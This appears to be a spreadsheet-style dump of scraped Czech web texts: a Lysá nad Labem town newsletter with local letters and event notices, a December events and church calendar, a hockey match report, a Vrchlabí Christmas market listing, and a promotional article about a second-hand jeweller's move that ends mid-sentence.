19. 10. v salonku restaurace U Bílé labutě. Každoročně se snažíme uspořádat výstavu a ukázat tak všem, co v našich lesích roste za různé druhy hub. A podařilo se. Opět jsme vystavili houby jedlé, méně známé, nejedlé i netradiční, jedovaté i nálezově vzácné. Celkem jsme vystavili 131 různých druhů hub, nasbíraných nejen v okolí Lysé, ale například v okolí Ralska , v blízkosti Bělé pod Bezdězem , v okolí Kostelce nad Černými lesy a Uhlířskými Janovicemi nebo například až v lesích kolem Kadaně . Samozřejmě, že na výstavu přilákaly především houby jedlé, jako například hřib dubový, hřib smrkový nebo vějířovec obrovský (vážící 6 kg), lošák jelení, hadovka smrdutá, lakovka ametystová (pro mnohé k překvapení jedlá ), ale i houby zvláštní svým vzhledem a léčivými účinky, jako vzácná lesklokorka lesklá (rejši). Výstavu navštívilo přibližně 120 návštěvníků, kterým byl podán v případě dotazů odborný výklad od členů houbařského spolku Lysá nad Labem a ještě odborněji diskutovali nad nalezenými houbami s návštěvníky mykolog Miroslav Rudolf a Ondra Tomeček z Houbařského spolku v Čelákovicích . Osobně bych chtěl poděkovat všem členům našeho spolku, kteří výstavu připravili. Velice si cením lidí, kteří v této složitější době věnují svůj osobní čas a ze svých vlastních prostředků, bez jakékoliv peněžní dotace, připraví pro občany všech generací našeho města hodnotnou akci nejen k pobavení, ale i získání zajímavých informací z houbařského prostředí. František Hajný K OKÉNKU ZASTUPITELE VLADISLAVA ŠPLÍCHALA V LISTOPADOVÝCH LISTECH Jeho reakce na článek paní Stařecké je nepochopení celé záležitosti. I já jsem poukazoval na to, že v naší organizaci jsou lidé, kteří mají zahrádku jako koníčka, aby měli aktivní pohyb, a zvýšení poplatků by pro některé bylo dost velký zásah do rodinného rozpočtu. Máme tam mladé rodiny. Tito lidé splácejí hypotéky, důchodci, kteří žijí z jednoho důchodu. To, že pan Šplíchal vypočítal měsíční náklady, nerozporuji. K této částce je potřeba ještě připočítat další výdaje na semena, např. paprika 5 ks 80 až 100 Kč. Ostatní semena se pohybují 50–70 Kč. Hnojiva podle druhu a výrobce. Postřiky proti plísním a padlí od 250 do 500 Kč. Další nemalou položkou jsou prostředky na hubení hlodavců a plžů. Takže každý pochopí, že zahrádkaření v dnešní době není zrovna levný koníček. Když si vezmeme, že žijeme v zelinářské oblasti, veškeré výpěstky se nechají koupit od zdejších pěstitelů za cenu, za kterou zahrádkář není schopen zeleninu vypěstovat, a to nesmí počítat svůj vynaložený čas. Proto jsem vděčný, že rada i na základě jejího článku nakonec rozhodla ve prospěch zahrádkářů. Organizace tak nebude mít problém doplnit stavy po členech, kteří ukončí činnost v ZO pro stáří nebo z jiného důvodu. Nebylo by dobré, aby důvodem bylo, že nejsou schopni zahrádku zaplatit. Jan Prosser Bývalý předseda ZO ČZS Lysá nad Labem 2 DĚTSKÝ KURZ BRUSLENÍ NA LEDĚ V současné době žije město Lysá novinkou pro letošní zimu – otevřením mobilního kluziště. V návaznosti na minulé roky, kdy jsme pro děti z Lysé byli nuceni pořádat kurzy bruslení v jiných městech, jsem ráda, že v letošní zimní sezóně můžeme kurz bruslení na ledě uspořádat přímo v Lysé nad Labem . Pro toto zimní období se nám díky vstřícnému jednání města podařilo pronajmout ledovou plochu na tři prosincová sobotní dopoledne, kdy bude probíhat výuka bruslení. Náplní budou základní úkony a obratnost při jízdě na bruslích, tj. správná technika jízdy dopředu, zatáčení, brždění apod. Lekce povedou zkušení instruktoři, se kterými máme navázanou letitou spolupráci a mnoho dětí je již zná z našich předešlých akcí. Všechny tři hodinové lekce budou na sebe metodicky navazovat a jsou vhodné pro děti od pěti let až po starší a zkušenější bruslaře, kteří se chtějí v jízdě na bruslích zdokonalit. Kurz bude probíhat v čase 9–10 h o adventních sobotách 7. 12., 14. 12. a 21. 12. Tyto brzké prosincové termíny byly vybrány kvůli tomu, aby se děti dovednost naučily co nejdříve a po následující měsíce se po kluzišti pohybovaly bezpečně, s jistotou a užily si nové možnosti zimního sportování. Na kurz je nutné děti přihlásit předem. Bližší informace a přihlášky poskytujeme prostřednictvím e-mailové komunikace: info@profitrainers.cz, letošní událost a fotografie z předchozích let jsou k nalezení na našem facebookovém profilu: PROFITRAINERS. Markéta Linhartová hl. trenérka dětské sportovní přípravky PROFITRAINERS PODZIM V MAP BYL PLNÝ AKCÍ, DĚKUJEME ZA PŘÍZEŇ V Místní akčním plánu v ORP Lysá nad Labem se během podzimu uskutečnilo plno zajímavých událostí. Mezi jednu z největších a nejdůležitějších akcí patří besedy o škodlivosti alkoholu , k nimž jsme oslovili mladého muže, kterého závislost stála opravdu hodně – skončil na vozíčku. Nyní o své zkušenosti s dětmi mluví. Na podzim jsme společně navštívili například ZŠ Kounice. Tamní děti nám na besedy daly pozitivní zpětnou vazbu, pár z těch, které vyšly ve školním časopisu Kouník, nabízíme zde: Uvědomila jsem si, že si mám vážit svého zdraví a nedělat blbosti. A když se přece jen něco nepovede, život tím nekončí. Nevěděl jsem, že alkohol může způsobit něco takového. Překvapilo mě, že je tak mladý a začal pít v 15. Je dobré, že si dokázal i z takové situace vzít pozitivní myšlenky a zkušenosti. Je super, že to nevzdal. Je něco jiného mluvit o alkoholu s člověkem, který si tím vším prošel. Zanechalo to ve mně nepříjemný pocit. Myslím, že si na to vzpomenu i jako dospělý. Měli bychom si života více vážit. Bylo mi Jirky líto, ale obdivuju jeho chuť předat zkušenosti dětem. Bylo vidět, že je to pro něj také těžké. Jsem ráda, že k nám někdo takový mohl přijít a slyšeli jsme to na vlastní uši. Žáci z 8. a 9. třídy ZŠ Kounice V MAP v ORP Lysá nad Labem nadále běží také další aktivity. Uskutečnilo se několik přednášek doktorky Ilony Špaňhlelové nebo inspirativní setkávání pro asistenty pedagoga, které vede učitelka Barbora Nováková ze ZŠ TGM Milovice, či výjezd do plzeňské Techmanie. Poslední akce letošního roku se uskuteční 2. prosince v podkroví radnice v Lysé nad Labem a půjde o učitelské vyhoření. Těšíme se na vás znovu v příštím roce, přejeme krásné Vánoce a pohodový rok 2025. Děkujeme za přízeň! S pozdravem Zuzana Zelenková koordinátor plánování a facilitace POSELSTVÍ VÁNOC Blížící se vánoční svátky nám dávají příležitost připomenout si narození Ježíše Krista . Tato událost naprosto přesně vystihuje charakter Toho, který miluje všechny lidi. Jako Boží Syn se dobrovolně vzdal své slávy, kterou měl v nebi. Přišel do lidského světa jako malé bezbranné dítě. Bylo odkázáno na péči chudé ženy a jejího manžela, obyčejného tesaře. Takhle nenápadně a navíc v bezvýznamné vesnici v Izraeli , v té době v okrajové provincii mocné říše, začal příběh záchrany lidstva. Prvními svědky tohoto zrození byli prostí pastýři ovcí. Nedlouho poté musela tahle rodina, kterou si Bůh vybral, aby se postarala o Jeho Syna, doslova přes noc, emigrovat do Egypta . Vyčkávala, dokud nezemřel krutý král Herodes, který dítěti usiloval o život. Po nějaké době se Josef s Marií a s malým Ježíšem usadili v odlehlém Nazaretu . Zde se Ježíš vyučil tesařem, chodil s rodiči pravidelně do synagogy a poslouchal je. Jeho čas měl teprve přijít. Boží charakter a způsob jednání se neprojevuje v okázalosti, ale nenápadně. Jako když ze semene v půdě pomalu vyrůstá krásná rostlina a bývá vystavená nepřízni přírodních živlů. Podobně jako droždí, které hospodyňka vpraví do mouky, prokvasí pěkně celé těsto. Bůh ve skutečnosti jedná pomalu a nenápadně. S námi lidmi pracuje velmi jemně. Totiž s láskou. Přejeme vám krásné Vánoce. Pavel a Pavla Zelení Apoštolská církev, Sbor Lysá nad Labem CHARITATIVNÍ SBÍRKA „KRABICE OD BOT“ Charitativní sbírka „KRABICE OD BOT“ je již sedmým rokem pořádána v Lysé nad Labem . Letos na novém, dostupnějším místě. Tím se za laskavé podpory a spolupráce města Lysá nad Labem stalo bývalé Pavlíkovo papírnictví na adrese Husovo náměstí 176, vchod je směrem od parkoviště na náměstí. Vše je dostatečně označeno. Vybírají se krabice s dárky pro děti různých věkových kategorií a pohlaví, dále je možnost odevzdat krabici pro maminku, tatínka nebo rodinu. Krabice s vašimi dárky jsou pak odevzdány organizacím sociálních služeb, které je odevzdávají sociálně potřebným. Mnohdy je to jediný dárek, které děti na Vánoce dostanou. Spolupracujeme s Odborem sociálních věcí města Lysá nad Labem , s Farní charitou Lysá nad Labem , s POINT Milovice a mnohými dalšími. Veškeré informace jsou dostupné na www.krabiceodbot.cz a na naší webové stránce www.krabiceodbotlysa.wz.cz, kterou průběžně aktualizujeme. Otevírací doba pro rok 2024 je: PO 25. 11. 15.00–16.00 ÚT 26. 11. 15.00–16.00 ST 27. 11. 15.00–16.00 ČT 28. 11. 15.00–16.00 PÁ 29. 11. 15.00–16.00 SO 30. 11. 13.00–17.00 NE 1. 12. 13.00–17.00 PO 2. 12. 15.00–16.00 ÚT 3. 12. 15.00–16.00 ST 4. 12. 15.00–16.00 ČT 5. 12. 15.00–16.00 PÁ 6. 12. 15.00–16.00 SO 7. 12. 13.00–17.00 NE 8. 12. 10.00–16.00 Individuálně se lze dohodnout na jiném čase předání na telefonním čísle 607 751 007. Děkuje za váš zájem o tuto charitativní akci a těšíme se na setkání. Bc. Jaroslava Lochmanová, Jitka Řezníčková DOPLNĚNÍ INFORMACÍ K SITUACI NA ULICI ČSA V LYSÉ NAD LABEM V reakci na článek místostarosty Vladislava Šplíchala v Listech 11/2024 bychom rádi uvedli na pravou míru několik tvrzení a předložili fakta o realizaci projektu na rekonstrukci ulice ČSA. Tento projekt, včetně náhradní výsadby a úprav, vznikl na základě odborně zpracované dokumentace, která byla pečlivě koordinována mezi úředníky, odborníky a zahradními architekty. Tvrdí-li pan místostarosta, že k projektové dokumentaci nebyly vzneseny žádné připomínky, není to pravda. Připomínky byly součástí komplexního procesu, ve kterém se zohlednily technické limity, jako například ochranná pásma inženýrských sítí, což ostatně dokládá zmínka o zapojení úřadu v Českém Brodě . Projekt byl financován s využitím dotace ve výši 5 milionů korun, jejíž podmínky vyžadují udržitelnost po dobu 5 let. K dnešnímu dni již neplatí, že je nutné dodržovat plných 5 let, jak se někdy uvádí. Po nástupu nového vedení města před dvěma lety, bylo možné kontaktovat poskytovatele dotace a jednat o změně vegetačních úprav. I když by to nebylo jednoduché, bylo možné připravit půdu pro budoucí změny. Po skončení udržitelnosti, přibližně za 3 roky, bude možné projekt dále upravit. Stávající vedení mělo dostatek času na to, aby o tyto změny požádalo. Současný stav je důsledkem realizace odborně navržených a schválených úprav, které byly zvoleny na základě technických a ekologických požadavků, nikoli z důvodu populistických nebo nekompetentních rozhodnutí. Projekt nebyl zpracován bez důkladného zvážení všech faktorů a město stále hledá možnosti, jak zvýšit bezpečnost a komfort na této ulici. Co se týče přístřešků na autobusových zastávkách, ty nebyly součástí původního projektu. Město ale plánovalo jejich doplnění na konci roku 2022. Je ironií, že ti, kteří jejich absenci nejvíce kritizovali, za dva roky tuto otázku nevyřešili. Nakonec je třeba připomenout, že rekonstrukce ulic ČSA a Mírové měla probíhat souběžně se stavbou obchvatu, což se kvůli známým důvodům nepodařilo. Projekt nebyl uskutečněn izolovaně, ale v komplikovaném kontextu, ovlivněném časovým harmonogramem a koordinací prací. Rekonstrukce silnice II/272 Lysá nad Labem , průtah (ulice ČSA) zvítězila v celostátní soutěži Česká dopravní stavba roku 2021, a získala titul za komplexní a citlivou rekonstrukci úseku silnice včetně rekonstrukce jednotné kanalizace, vodovodního řadu a přeložek inženýrských sítí. Titul předal 22. září 2022 na slavnostním galavečeru v Betlémské kapli ministr dopravy a místopředsedkyně PS Parlamentu ČR. Ing. Karel Otava Ing. Karolína Stařecká TŘÍDĚNÝ ODPAD V našem městě máme několik stanovišť s kontejnery na tříděný odpad. V minulosti jsem na zasedání zastupitelstva města upozorňoval na neutěšený stav v Okružní ulici v blízkosti MŠ Pampeliška a v Sokolské ulici v blízkosti OD Penny, ale jako bych hrách na zeď házel. Vyvrcholení nepořádku kolem kontejnerů v Sokolské ulici bylo od 17. 10. do 23. 10., kde vznikla hromada odpadků, která nikomu nevadila! Říká se, že všechno se vším souvisí. Tak se podívejme, proč u kontejnerů s tříděným odpadem je tolik problémů. Nové vedení zrušilo platbu za pytlový sběr plastů a papíru. Mnoho občanů přestalo třídit do pytlů a začalo plasty a papír dávat do kontejnerů, což je v pořádku, ale je jich nedostatek, jsou často přeplněny. Dalším problémem je i neukázněnost a pohodlnost některých občanů, kteří pod rouškou noci vyhazují odpadky, které tam nepatří. Přitom máme jeden z nejlepších sběrných dvorů v kraji, který perfektně vedou manželé z Ukrajiny . Příčina popsané situace je i v organizaci práce u TS. O situaci kolem stanovišť s tříděným odpadem jsem informoval pana starostu a žádal o řešení. Uvidíme, jak to tentokrát dopadne. Ján Šturm emeritní zastupitel ČP 2024 VE VESLOVÁNÍ MČR žactva, dorostu, juniorů, seniorů a družstev se bodují do Českého poháru. V letošním roce se nám podařilo umístit na 10. příčce z 35 klubů. Přehled umístění jednotlivých kategorií: → Žáci mladší – 5. místo → Žačky starší – 1. místo → Žáci starší – 6. místo → Dorostenky – 10. místo → Dorostenci – 17. místo → Juniorky – 13. místo → Junioři – 11. místo → Ženy – 9. místo → Muži – 14. místo Všem děkujeme za závodní nasazení v průběhu celé sezóny! Celkové výsledky: https://zavody.veslo.cz/ cs/score/12/club/ Veslařský klub Lysá nad Labem</t>
  </si>
  <si>
    <t>20241201_289_3474522029_bdf2be1148c6809f5043.html</t>
  </si>
  <si>
    <t>bdf2be1148c6809f5043</t>
  </si>
  <si>
    <t>KALENDÁRIUM</t>
  </si>
  <si>
    <t>KALENDÁRIUM Přehled kulturních a dalších akcí v Lysé nad Labem a okolí na prosinec 2024. Podrobné informace o všech akcích podá Turistické informační centrum Husovo náměstí 23, Lysá nad Labem , telefon: 734 512 952 e-mail: info@ticlysa.cz. 1.–21. prosince PŘEDVÁNOČNÍ PRODEJNÍ VÝSTAVA Turistické informační centrum Lysá nad Labem 4. prosince MIKULÁŠSKÁ BESÍDKA 16.00 / Kino Lysá nad Labem 4. prosince ZASTUPITELSTVO MĚSTA LYSÁ NAD LABEM 17.00 / Podkroví radnice 5. prosince SE STAROSTOU NA PIVO 18.00 / Slovanka Bistro a Bar 5. prosince MIKULÁŠ S ČERTY A ANDĚLEM 16.00–19.00 / náměstí Bedřicha Hrozného 5. prosince ČERTOVSKÝ VŮZ 19.00 / Husovo náměstí 6.–8. prosince POLABSKÉ VÁNOČNÍ TRHY – MIKULÁŠSKÉ TRHY Výstaviště Lysá nad Labem 7. prosince KRAMPUS SHOW 15.00 / Výstaviště Lysá nad Labem 11. prosince VÁNOČNÍ CIRKUS artistická skupina Mistral 17.00 / Kino Lysá nad Labem 13.–15. prosince POLABSKÉ VÁNOČNÍ TRHY – STŘÍBRNÉ TRHY Výstaviště Lysá nad Labem 20.–22. prosince POLABSKÉ VÁNOČNÍ TRHY – ZLATÉ TRHY Výstaviště Lysá nad Labem Vánoce 2024 v římsko-katolické farnosti Lysá nad Labem Úterý 24. 12. VIGILIE NAROZENÍ PÁNĚ 13.30 hodin Lysá nad Labem : vánoční zpívání a živý Betlém 15.30 hodin Kostomlaty nad Labem : vigilie pro rodiče s dětmi 22.00 hodin Milovice : vigilie půlnoční 24.00 hodin Lysá nad Labem : půlnoční mše svatá Středa 25. 12. SLAVNOST NAROZENÍ PÁNĚ (ZASVĚCENÝ SVÁTEK) 8.00 hodin Milovice 9.30 hodin Lysá nad Labem 11.00 hodin Kostomlaty nad Labem Čtvrtek 26. 12. SVÁTEK SV. ŠTĚPÁNA, PRVOMUČEDNÍKA 8.00 hodin Milovice 9.30 hodin Lysá nad Labem Pátek 27. 12. SVÁTEK SV. JANA EVANGELISTY (ŽEHNÁNÍ VÍNA ) 17.00 hodin Lysá nad Labem Sobota 28. 12. SVÁTEK SV. BETLÉMSKÝCH DĚTÍ, MUČEDNÍKŮ 17.00 hodin Lysá nad Labem Neděle 29. 12. SVÁTEK SVATÉ RODINY 17.00 hodin Lysá nad Labem Pondělí 30. 12. (6. DEN OKTÁVU NAROZENÍ PÁNĚ) 17.00 hodin Lysá nad Labem Úterý 31. 12. (7. DEN OKTÁVU NAROZENÍ PÁNĚ) 8.00 hodin Milovice 9.30 hodin Lysá nad Labem : poděkování za uplynulý rok (mše sv.) Středa 1. 1. 2025 SLAVNOST MATKY BOŽÍ PANNY MARIE 8.00 hodin Milovice 9.30 hodin Lysá nad Labem Ze srdce přeji pokojné a radostné Vánoce a v novém roce 2025 hodně milostí a darů Ducha Svatého! Váš otec Pavel</t>
  </si>
  <si>
    <t>20241201_29_3478955488_04386210d82010321863.html</t>
  </si>
  <si>
    <t>04386210d82010321863</t>
  </si>
  <si>
    <t>Čtvrtá výhra v řadě, Motor proti Hradci uspěl</t>
  </si>
  <si>
    <t>Čtvrtá výhra v řadě, Motor proti Hradci uspěl Motor doma porazil Hradec Králové . Jihočeši v utkání již v první třetině dvakrát vedli. Ve druhé třetině své vedení udrželi a v třetině třetí ještě o gól rozšířili. Budějovičtí tak zapisují čtvrtou výhru v řadě. Pátý korálek mohou Jihočeši navléct již ve středu v Budvar areně proti Vítkovicím . Úvodní buly vyhrál Motor a i on vstoupil do utkání aktivněji. První větší šanci si připsal domácí kapitán Gulaš, avšak na konci čtvrté minuty pálil z otočky mimo. O necelou minutu později brankou neskončila ani souhra Zohorny s Olesenem, proti ní se totiž vytáhl zákrokem brankář Hradce Škorvánek. V čase 5:38 to však již Motoru vyšlo. Ordoš posunul puk ve středním pásmu Kašlíkovi, který ho potáhl do pásma útočného. Slovenskému útočníkovi najížděl na druhém křídle ještě jeden ze spoluhráčů. Matej Kašlík se však rozhodl pro krásně utaženou střelu, kterou otevřel skóre - 1:0. Motor se brankou posílil a chtěl vedení ihned navýšit, avšak Hradec z první šance na druhé straně vyrovnal. Kalina dostal puk na Graema McCormacka, který si nabruslil do útočné zóny a povedenou ranou v čase 7:21 vymetl pavučinky v budějovické síti - 1:1. V deváté minutě byl vyloučen za sekání hostující Miškář, Motor si však v přesilové hře nevytvořil žádnou velkou šanci. Následně si oba týmy utvořily několik šancí, které však neměli nejmenší problém pochytat brankáři obou mužstev. Důležitý moment přišel až v čase 12:25. To byl vyloučen za podrážení hostující Freibergs a Motor po jedenácti sekundách trestal. Gulaš předal puk Zohornovi, který přesnou přihrávkou zpoza branky našel Jana Ordoše , který vrátil Jihočechům vedení - 2:1. Motor po vstřelené brance opět ožil. Velmi nebezpečné byly například pobyty první formace Motoru, avšak všechny šance opět pochytal Škorvánek. V sedmnácté minutě z bezprostřední blízkosti netrefil branku na druhé straně Jergl. Vůbec největší šanci na další změnu skóre však spálil v 19.minutě Ordoš , který osamocen před brankou trefil pouze Škorvánka. Ve zbytku třetiny se již nic podstatného neudálo, a tak byl stav o první pauze 2:1 z pohledu Motoru. Motor do druhé třetiny nevstoupil ideálně. Již po 59 sekundách se nechal vyloučit domácí brankář Klouček za posunutí branky. Trest za něj odpykal kapitán Gulaš, který na trestné lavici zůstal pouze 41 sekund. Klíma krásnou přihrávkou přes osu hřiště našel Aleše Jergla, který s menší dávkou štěstí dostal puk podruhé v zápase za Kloučka - 2:2. Reakce Motoru však snad ani nemohla být lepší. Nejdříve ujela do přečíslení dvojice Harris - Ordoš , která si však nerozuměla kombinačně, a tak Motoru vedení nevrátila. To se ale povedlo v čase 23:54 právě kanadskému útočníkovi. V tu dobu hráli domácí přesilovku po vyloučení hostujícího útočníka Dmowského. Gulaš skvěle zachytil puk a vrátil ho do předbrankového prostoru pro Branta Harrise, který potřetí dostal Motor do vedení - 3:2. V 25.minutě rozhodčí opět vylučovali. Museli tak učinit kvůli vzájemné potyčce mezi Douderou a hostujícím Pavlíkem. Na konci 29.minuty už většina fanoušků Motoru zvedala ruce nad hlavu počtvrté, ale Přikryl při další početní výhodě z blízka netrefil branku. Hradecká nedisciplinovanost však pokračovala nadále. V 30.minutě usednul na trestnou lavici Freibergs, domácí si však kromě další spálené šance Přikryla nic nevytvořili. A tak do útoku opět vyrazil Hradec . Klouček musel zasahovat proti střele Jergla. Následně se hra přelévala ze strany na stranu. Za domácí se však netrefil například Vráblík. Naopak za Hradec nepřesně pálil Klíma. Novotný v další šanci pálil pouze do připraveného Kloučka. Další Vráblíkův pokus z 39.minuty pochytal Škorvánek. Ani jiní střelci ve zbytku třetiny neuspěli, a tak byl stav o druhé přestávce 3:2 z pohledu Motoru. Do třetí třetiny vstoupili domácí velmi dobře. Nejdříve sice musel Klouček čelit Klímově střele, tu však bez váhání schoval v lapačce. Avšak poté vyrazili do útoku opět domácí. První střelu Beránka ještě Škorvánek chytil, ale v čase 42:29 již lovil puk ze své sítě počtvrté. Koláček zachytil chybnou rozehrávku hostů a vyslal po křídle do úniku Jakuba Valského a ten pěknou ranou dostal Motor poprvé do dvoubrankového vedení - 4:2. Ve 44.minutě se již Pavlík hotovil ke střele, ale skvělým obranným zákrokem ho zastavil Ordoš . O dvě minuty později si Klouček skvělým reflexem smlsnul na zakončení Perreta. Následně budějovický brankář musel likvidovat ještě zakončení Novotného či Pláňka, avšak ani oni si na maskovaného muže s číslem 35 nepřišli. V 49.minutě byli za hrubost po vzájemné potyčce vyloučeni Zohorna a hostující Pour. Při hře ve čtyřech byli aktivnější hosté. Perret, Batna i Pavelka však ztroskotali opět na připraveném domácím brankáři, popřípadě na dobře hrající obraně Motoru. V 55.minutě našel slibně najetého Gulaše přihrávkou Pýcha. Domácí kapitán však složité zakončení z úhlu v branku neproměnil. V 56.minutě mohla pro domácí přijít komplikace ve formě vyloučení Přikryla za vyhození puku mimo hřiště. Hosté si vzali oddechový čas o odvolali Škorvánka z branky. Hradec však ani dvojnásobnou přesilovku nevyužil. V posledních minutách se sice Východočeši snažili vrátit se do zápasu, avšak Kloučka již neprostřelili. V posledních sekundách se na ledě strhla potyčka, po které přišly opět tresty na obou stranách, ani ty už však výsledek zápasu neovlivnily. Motor zvítězil nad Hradcem 4:2. Banes Motor České Budějovice – Mountfield HK 4:2 (2:1, 1:1, 1:0) Branky a nahrávky : 6. Kašlík ( Ordoš , Vráblík), 13. Ordoš (T. Zohorna, Gulaš), 24. Harris (Gulaš, Adam Kubík ), 43. Valský (Koláček) – 8. McCormack (Kalina), 22. Jergl (Kevin Klíma, Pavelka) Rozhodčí : Mrkva, Vrba – Lederer, Zíka Vyloučení : 5:8 Využití : 2:1 V oslabení : 0:0 Diváci : 6082 Střely na branku : 28:25 Průběh utkání : 1:0, 1:1, 2:1, 2:2, 4:2 Motor : Klouček (Strmeň) – Pýcha, Reilly, Cibulka, Vráblík, Doudera (A), Kachyňa – Olesen, T. Zohorna (A), Gulaš (C) – Ordoš , Harris, Kašlík – Adam Kubík , Přikryl, M. Beránek – Koláček, Toman, Valský – Hoch Mountfield : Škorvánek (F. Novotný) – Freibergs, Mudrák, Kalina, McCormack, Pavelka (C), Pláněk – P. Moravec, Perret (A), Tamáši – Jergl, R. Pavlík, Miškář – Šťastný, A. Novotný , Batna – Pour, Pilař, Kevin Klíma – Dmowski, Štohanzl Ohlasy po zápasu Jiří Hanzlík (Motor): "Vítězství nad Hradcem si velice ceníme. Vyrovnali jsme se mu ve vitalitě a houževnatosti. Tentokrát jsme se vyvarovali slabších pasáží, které v utkání míváme. Pouze ve třetí třetině jsme se dostali pod tlak, ale zvládli jsme to mnohem lépe než naposledy doma s Kometou." Peter Frühauf ( Hradec ): "Soupeř byl jasně lepší. Převýšil nás v aktivitě i soubojích, vytvořil si mnohem více šancí. Neměli jsme ani metr ledu, abychom se dostali do naší rychlé a bruslivé hry. Mrzí mě ale, že první gól jsme dostali ze situace, na kterou jsme se připravovali. A při druhém gólu naháníme rozhodčího, který se chystá vylučovat, místo abychom se soustředili na hru. Soupeř by stejně asi vyhrál, ale tyto dvě situace mě naštvaly." Autor: Marek Dvořák Autor person Marek Dvořák</t>
  </si>
  <si>
    <t>17790</t>
  </si>
  <si>
    <t>20241201_290_3474311450_93dc8005c1893668f026.html</t>
  </si>
  <si>
    <t>93dc8005c1893668f026</t>
  </si>
  <si>
    <t>Vánoční jarmark ve Vrchlabí – Vánoce v muzeu – Kudy z nudy</t>
  </si>
  <si>
    <t>Vánoční jarmark ve Vrchlabí – Vánoce v muzeu – Kudy z nudy Tato akce již proběhla a není tedy aktuální. Prohlédněte si aktuální akce v okolí této již neaktuální akce, prozkoumejte aktuální akce v regionu Královéhradecký kraj nebo navštivte Lidová řemesla a trhy v celé ČR . Přijďte si zpříjemnit začátek adventu do muzea. Těšit se můžete na jarmark, doprovodný program a něco na zahřátí. Nebudou chybět ani rukodělné dílničky – výroba adventních věnců či korálkových ozdob. Na jarmarku můžete nakoupit drobnosti pro své milé nebo vánoční ozdoby na váš stromeček či stůl, ochutnáte i různé dobroty. Akce se koná v KM Vrchlabí – čtyři historické domky na nám. Míru. . Program: 10.00 křest knihy Historie Krkonošského muzea ve Vrchlabí 10.30 zpívání koled s NaVáHuTě 14.30 přednáška Krkonošské koledy Rozzářené ulice, veselý shon na vánočních trzích, slavnostní výzdoba, ale také nostalgické rozjímání přesvědčí i zaryté nepřátele svátků, že Vánoce... Vrchlabské Návštěvnické centrum Krkonošského národního parku – Muzeu Krkonoš bude v týdnu od 25. listopadu do 2. prosince 2024 uzavřeno. Jedná se o...</t>
  </si>
  <si>
    <t>20241201_291_3474514077_e28a28c4c67eda76dc9d.html</t>
  </si>
  <si>
    <t>e28a28c4c67eda76dc9d</t>
  </si>
  <si>
    <t>Kam se přestěhoval second hand zlatníky: Exkluzivní odhalení nové lokace</t>
  </si>
  <si>
    <t>Shrnutí Kam se přestěhoval second hand zlatníky: Exkluzivní odhalení nové lokace Když se řekne „second hand zlatníky“, většině z nás vyvstane představa o unikátních špercích, které skrývají příběhy a historii. Ale víte, kam se přestěhoval second hand zlatníky? Připravte se na exkluzivní odhalení nové lokace, kde se nejen potkáte s krásnými kousky zlatnického umění, ale také objevíte koncept, který spojuje tradici s moderním stylem. V tomto článku vás provedeme všemi detaily této vzrušující změny a prozradíme, co nového na vás v této oblíbené destinaci čeká. Obsah článku Kam se přestěhoval second hand zlatníky Nová a lákavá lokalita pro milovníky zlatnictví Co očekávat v novém obchodě? Důvody, proč navštívit novou lokaci Proč zlatníky mění svou lokaci Co to znamená pro zákazníky Nová lokalita a její výhody Jak najít second hand zlatníky Nejlepší tipy pro nákupy v zlatnících Zkušenosti zákazníků na nové adrese Budoucnost second hand zlatníků v regionu Jak second handy ovlivňují trh s šperky Časté Dotazy Závěrečné myšlenky Nenechte si ujít: Kam se přestěhoval second hand zlatníky Nová a lákavá lokalita pro milovníky zlatnictví Dobré zprávy pro všechny, kdo milují originální kousky a hledají skvosty na místech, kde byste je nečekali ! Second hand zlatníky se přestěhoval na novou adresu, kterou byste si rozhodně měli zapsat do svých diářů. Nyní se nachází ve Vídeňské ulici 25 , což je vřelý ráj pro nákupní nadšence. V novém prostoru si mohou zákazníci vychutnat nejen šperky, ale také příjemnou atmosféru a stylovou výzdobu! Co očekávat v novém obchodě? V nové lokalitě na vás čeká jednoduše nepřeberné množství různorodých kousků, od elegantních náhrdelníků až po vintage prsteny. Díky přesunu má obchod nyní více místa a možnost vystavit širší sortiment. Zde je několik věcí, které byste měli mít na paměti : Stále zelený výběr: Každý týden se do sortimentu přidávají nové kousky. Úžasné akce: Sledujte sociální sítě pro speciální slevy a akce zaměřené na milovníky vintage! Přátelský personál: Zkušení prodavači vám rádi poradí a pomohou vybrat ten pravý kousek pro vás. Důvody, proč navštívit novou lokaci Jednoduše – na nové adrese si užijete nákupy jako nikdy předtím! S novým designem obchodu se vám otevře zcela nový svět šperků s duší. Neváhejte a stavte se na šálek kávy a probrání nejnovějších módních trendů v oblasti šperků. A kdo ví, možná najdete právě to, co vám zaručeně vykouzlí úsměv na tváři. Kategorie Příklady Prsteny Vintage, dózy, moderní designy Náhrdelníky Perlové, stříbrné, zlaté Náušnice Visací, pecky, extravagantní styly Proč zlatníky mění svou lokaci V poslední době se zlatníky rozhodli upgradovat své prostory a přesunout se do nové lokace. Tato změna není jen tak ledajaká, za níž stojí několik klíčových faktorů, které mohou mít zásadní dopad na jejich provoz. Zde jsou hlavní důvody, proč se rozhodli k tomuto kroku: Větší prostor pro zboží: Nová lokalita nabízí více místa, což zlatníkům umožní prezentovat širší výběr zboží. Místo, kde můžete narazit na šperky z různých období či nečekané vintage kousky, bude určitě lákat nové zákazníky. Lepší dostupnost: Místo, kde se nyní nacházejí, je lépe dostupné veřejnou dopravou a nabízí i parkovací možnosti. Díky tomu se k nim dostane více lidí, což může výrazně zlepšit návštěvnost obchodu. Modernizace interiéru: Nový prostor umožňuje zavést atraktivnější design a moderní technologie, což zlepší celkový nákupní zážitek. Kdo by odolal elegantnímu aranžmá a modernímu osvětlení? V neposlední řadě, zlatníci se snaží oslovit i mladší generaci, která často vyhledává unikátní a ekologické alternativy k masově vyráběným šperkům. Často se říká, že „všude dobře, doma nejlépe“, ale komu by se nezdálo „trochu lépe“ v nově zrekonstruovaném prostoru? O následujících týdnech uvidíme, jak rychlé dopady tato změna přinese. Pokud máte rádi vintage poklady, nenechte si ujít novinku a přijďte se podívat! Co to znamená pro zákazníky Nová lokalita second handu Zlatníků přináší pro zákazníky mnoho výhod. Zde je několik klíčových aspektů, na které se můžete těšit: Širší sortiment: Nové prostory umožňují rozšíření nabídky zboží. Od šperků po vintage kousky, můžete zde najít jedinečné předměty, které jinde neseženete. Pohodlnější přístup: Díky lokalitě blízko centra města je snadnější se sem dostat. Takže i ti, co neradi jezdí daleko, mají nově možnost pohodlně si prohlédnout nabídku. Akce a výprodeje: Nové místo s sebou nese i nové akce. Sledujte pozorně oznámení, protože se chystají speciální výprodeje a akční nabídky, které si nenechte ujít! Když mluvím o druhé ruce, nemohu si pomoct, abych si nevzpomněl na svůj první objev – starý brož s perličkami, který jsem koupil za pár korun a stal se z něj středobod mé 